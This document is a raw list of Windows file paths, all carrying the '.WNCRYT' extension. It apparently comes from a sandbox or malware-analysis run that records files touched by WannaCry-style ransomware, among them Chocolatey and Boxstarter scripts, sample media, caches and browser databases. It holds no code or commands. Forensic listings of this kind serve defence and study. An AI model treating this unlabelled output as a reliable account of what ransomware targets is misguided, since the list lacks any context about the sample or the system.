file: C:\ProgramData\chocolatey\helpers\functions\Install-ChocolateyPowershellCommand.ps1.WNCRYT
file: C:\ProgramData\chocolatey\helpers\functions\Install-ChocolateyShortcut.ps1.WNCRYT
file: C:\ProgramData\chocolatey\helpers\functions\Install-ChocolateyVsixPackage.ps1.WNCRYT
file: C:\ProgramData\chocolatey\helpers\functions\Install-ChocolateyZipPackage.ps1.WNCRYT
file: C:\ProgramData\chocolatey\helpers\functions\Install-Vsix.ps1.WNCRYT
file: C:\ProgramData\chocolatey\helpers\functions\Set-EnvironmentVariable.ps1.WNCRYT
file: C:\ProgramData\chocolatey\helpers\functions\Set-PowerShellExitCode.ps1.WNCRYT
file: C:\ProgramData\chocolatey\helpers\functions\Start-ChocolateyProcessAsAdmin.ps1.WNCRYT
file: C:\ProgramData\chocolatey\helpers\functions\Test-ProcessAdminRights.ps1.WNCRYT
file: C:\ProgramData\chocolatey\helpers\functions\Uninstall-BinFile.ps1.WNCRYT
file: C:\ProgramData\chocolatey\helpers\functions\Uninstall-ChocolateyEnvironmentVariable.ps1.WNCRYT
file: C:\ProgramData\chocolatey\helpers\functions\Uninstall-ChocolateyPackage.ps1.WNCRYT
file: C:\ProgramData\chocolatey\helpers\functions\UnInstall-ChocolateyZipPackage.ps1.WNCRYT
file: C:\ProgramData\chocolatey\helpers\functions\Update-SessionEnvironment.ps1.WNCRYT
file: C:\ProgramData\chocolatey\helpers\functions\Write-FunctionCallLogMessage.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\boxstarter\tools\chocolateyinstall.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\boxstarter.bootstrapper\tools\chocolateyinstall.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\boxstarter.bootstrapper\tools\setup.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Cleanup-Boxstarter.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Get-BoxstarterTempDir.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Get-PendingReboot.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Init-Settings.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Install-BoxstarterExtension.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Invoke-Boxstarter.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Invoke-Reboot.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Set-SecureAutoLogon.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Start-UpdateServices.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Stop-UpdateServices.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Test-PendingReboot.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\boxstarter.chocolatey\tools\BoxstarterShell.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\boxstarter.chocolatey\tools\chocolateyinstall.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\boxstarter.chocolatey\tools\chocolateyUninstall.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\boxstarter.chocolatey\tools\setup.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Boxstarter.zip.WNCRYT
file: C:\ProgramData\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\BoxstarterConnectionConfig.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Chocolatey.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Enable-BoxstarterClientRemoting.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Enable-BoxstarterCredSSP.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Enable-RemotePsRemoting.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Get-BoxstarterConfig.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Get-PackageRoot.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Init-Settings.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Install-BoxstarterPackage.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Invoke-BoxstarterBuild.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Invoke-BoxstarterFromTask.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\invoke-chocolatey.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Invoke-ChocolateyBoxstarter.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\New-BoxstarterPackage.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\New-PackageFromScript.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Resolve-VMPlugin.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Send-File.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Set-BoxstarterConfig.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Set-BoxstarterShare.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.Common\tools\chocolateyinstall.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.Common\tools\setup.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Confirm-Choice.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Create-BoxstarterTask.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Enter-DotNet4.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Format-BoxStarterMessage.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-BoxstarterTaskContextTempDir.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-CurrentUser.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-HttpResource.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-IsMicrosoftUpdateEnabled.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-IsRemote.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Init-Settings.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Invoke-FromTask.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Invoke-RetriableScript.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Log-BoxStarterMessage.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Out-BoxstarterLog.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Remove-BoxstarterError.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Remove-BoxstarterTask.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Start-TimedSection.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Stop-TimedSection.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Test-Admin.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Write-BoxstarterLogo.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Write-BoxstarterMessage.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\Boxstarter.HyperV\tools\chocolateyinstall.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\Boxstarter.HyperV\tools\setup.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\Boxstarter.HyperV\tools\Boxstarter.HyperV\Enable-BoxstarterVHD.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\Boxstarter.HyperV\tools\Boxstarter.HyperV\Enable-BoxstarterVM.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.WinConfig\tools\chocolateyinstall.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.WinConfig\tools\setup.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-BingSearch.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-GameBarTips.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-InternetExplorerESC.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-MicrosoftUpdate.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-UAC.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Enable-MicrosoftUpdate.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Enable-RemoteDesktop.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Enable-UAC.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Get-LibraryNames.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Get-UAC.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Install-WindowsUpdate.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Move-LibraryDirectory.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Restart-Explorer.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-BoxstarterPageFile.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-BoxstarterTaskbarOptions.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-CornerNavigationOptions.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-ExplorerOptions.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-StartScreenOptions.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-TaskbarSmall.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-WindowsExplorerOptions.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Update-ExecutionPolicy.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Get-PackageParameters.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Get-UninstallRegistryKey.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Install-ChocolateyDesktopLink.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Write-ChocolateyFailure.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Write-ChocolateySuccess.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Write-FileUpdateLog.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\chocolatey-core.extension\extensions\Get-AppInstallLocation.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\chocolatey-core.extension\extensions\Get-AvailableDriveLetter.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\chocolatey-core.extension\extensions\Get-EffectiveProxy.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\chocolatey-core.extension\extensions\Get-PackageCacheLocation.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\chocolatey-core.extension\extensions\Get-WebContent.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\chocolatey-core.extension\extensions\Register-Application.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\chocolatey-core.extension\extensions\Remove-Process.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\DotNetFrameworkHelpers.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Install-ChocolateyInstallPackageAndHandleExitCode.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Get-WindowsUpdateErrorDescription.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Install-ChocolateyPackageAndHandleExitCode.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Install-WindowsUpdate.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Test-WindowsUpdate.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\dotnet-5.0-runtime\tools\ChocolateyInstall.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\dotnet-6.0-runtime\tools\ChocolateyInstall.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\Firefox\tools\chocolateyInstall.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\Firefox\tools\chocolateyUninstall.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\Firefox\tools\helpers.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\GoogleChrome\tools\chocolateyInstall.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\GoogleChrome\tools\helpers.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\jre8\tools\chocolateyInstall.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\jre8\tools\chocolateyUninstall.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\KB2919355\tools\ChocolateyInstall.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\KB2919442\tools\ChocolateyInstall.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\KB2999226\tools\chocolateyinstall.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\KB3035131\Tools\ChocolateyInstall.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\KB3063858\Tools\ChocolateyInstall.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\KB3118401\Tools\ChocolateyInstall.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\powershell-core\tools\chocolateyinstall.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\powershell-core\tools\Reset-PWSHSystemPath.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\python3\tools\chocolateyInstall.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\python3\tools\helpers.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\vcredist140\tools\chocolateyInstall.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\vcredist140\tools\chocolateyUninstall.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\vcredist2005\tools\chocolateyInstall.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\vcredist2008\tools\chocolateyInstall.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib\winrar\tools\chocolateyInstall.ps1.WNCRYT
file: C:\ProgramData\chocolatey\lib-bad\adobereader\tools\chocolateyinstall.ps1.WNCRYT
file: C:\ProgramData\chocolatey\redirects\RefreshEnv.cmd.WNCRYT
file: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png.WNCRYT
file: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png.WNCRYT
file: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png.WNCRYT
file: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png.WNCRYT
file: C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png.WNCRYT
file: C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png.WNCRYT
file: C:\ProgramData\Microsoft\User Account Pictures\guest.bmp.WNCRYT
file: C:\ProgramData\Microsoft\User Account Pictures\user.bmp.WNCRYT
file: C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile10.bmp.WNCRYT
file: C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile11.bmp.WNCRYT
file: C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile12.bmp.WNCRYT
file: C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile13.bmp.WNCRYT
file: C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile14.bmp.WNCRYT
file: C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile15.bmp.WNCRYT
file: C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile16.bmp.WNCRYT
file: C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile17.bmp.WNCRYT
file: C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile18.bmp.WNCRYT
file: C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile19.bmp.WNCRYT
file: C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile20.bmp.WNCRYT
file: C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile21.bmp.WNCRYT
file: C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile22.bmp.WNCRYT
file: C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile23.bmp.WNCRYT
file: C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile24.bmp.WNCRYT
file: C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile25.bmp.WNCRYT
file: C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile26.bmp.WNCRYT
file: C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile27.bmp.WNCRYT
file: C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile28.bmp.WNCRYT
file: C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile29.bmp.WNCRYT
file: C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile30.bmp.WNCRYT
file: C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile31.bmp.WNCRYT
file: C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile32.bmp.WNCRYT
file: C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile33.bmp.WNCRYT
file: C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile34.bmp.WNCRYT
file: C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile35.bmp.WNCRYT
file: C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile36.bmp.WNCRYT
file: C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile37.bmp.WNCRYT
file: C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile38.bmp.WNCRYT
file: C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile39.bmp.WNCRYT
file: C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile40.bmp.WNCRYT
file: C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile41.bmp.WNCRYT
file: C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile42.bmp.WNCRYT
file: C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile43.bmp.WNCRYT
file: C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile44.bmp.WNCRYT
file: C:\ProgramData\Microsoft\Windows\Caches\cversions.2.db.WNCRYT
file: C:\ProgramData\Microsoft\Windows\Caches\{1A0A057C-F009-4C89-B7DC-E386BCD2DDFD}.2.ver0x0000000000000002.db.WNCRYT
file: C:\ProgramData\Microsoft\Windows\Caches\{4E4260A4-7E39-442E-BC22-7FF751D1C161}.2.ver0x0000000000000002.db.WNCRYT
file: C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000001e.db.WNCRYT
file: C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000023.db.WNCRYT
file: C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000025.db.WNCRYT
file: C:\ProgramData\Microsoft\Windows\Caches\{8396BDEC-CD34-467F-8EB0-706C57B90A2C}.2.ver0x0000000000000002.db.WNCRYT
file: C:\ProgramData\Microsoft\Windows\Caches\{887A11BA-C40B-40DA-A994-13F5794EDA58}.2.ver0x0000000000000002.db.WNCRYT
file: C:\ProgramData\Microsoft\Windows\Caches\{B77EA8CB-9C6F-4A20-B584-EAC4FF2DF997}.2.ver0x0000000000000002.db.WNCRYT
file: C:\ProgramData\Microsoft\Windows\Caches\{BC414B5B-48AF-4C2E-9D4C-B5A51C0970CA}.2.ver0x0000000000000001.db.WNCRYT
file: C:\ProgramData\Microsoft\Windows\Caches\{BC414B5B-48AF-4C2E-9D4C-B5A51C0970CA}.2.ver0x0000000000000002.db.WNCRYT
file: C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000003.db.WNCRYT
file: C:\ProgramData\Microsoft\Windows\Caches\{ECA0F554-74BF-4F43-9EC2-07E05C31BB3E}.2.ver0x0000000000000001.db.WNCRYT
file: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 01.wma.WNCRYT
file: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 02.wma.WNCRYT
file: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 03.wma.WNCRYT
file: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 04.wma.WNCRYT
file: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 05.wma.WNCRYT
file: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 06.wma.WNCRYT
file: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 07.wma.WNCRYT
file: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 08.wma.WNCRYT
file: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 09.wma.WNCRYT
file: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 10.wma.WNCRYT
file: C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-97EFDC75E4C4E7D093DE204032CBD352A3D2415B.bin.DB.WNCRYT
file: C:\ProgramData\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif.WNCRYT
file: C:\Users\Public\Music\Sample Music\Kalimba.mp3.WNCRYT
file: C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3.WNCRYT
file: C:\Users\Public\Music\Sample Music\Sleep Away.mp3.WNCRYT
file: C:\Users\Public\Videos\Sample Videos\Wildlife.wmv.WNCRYT
file: C:\Users\user\AppData\Local\IconCache.db.WNCRYT
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\previews_opt_out.db.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AppBlue.png.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AppWhite.png.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AutoPlayOptIn.gif.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AutoPlayOptIn.png.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\CollectOneDriveLogs.bat.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ElevatedAppBlue.png.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ElevatedAppWhite.png.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\Error.png.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\OneDriveLogo.png.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\QuotaCritical.png.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\QuotaError.png.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\QuotaNearing.png.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ScreenshotOptIn.gif.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\Warning.png.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\cloud.svg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\iceBucket.svg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\onedrivePremium.svg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\partiallyFreezing.svg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\settings.svg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\settingsdisabled.svg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\stackedIceCubes.svg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\waterGlass.svg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000013.db.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000014.db.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\microsoft-logo.png.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\script.js.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\15\Built-In Building Blocks.dotx.WNCRYT
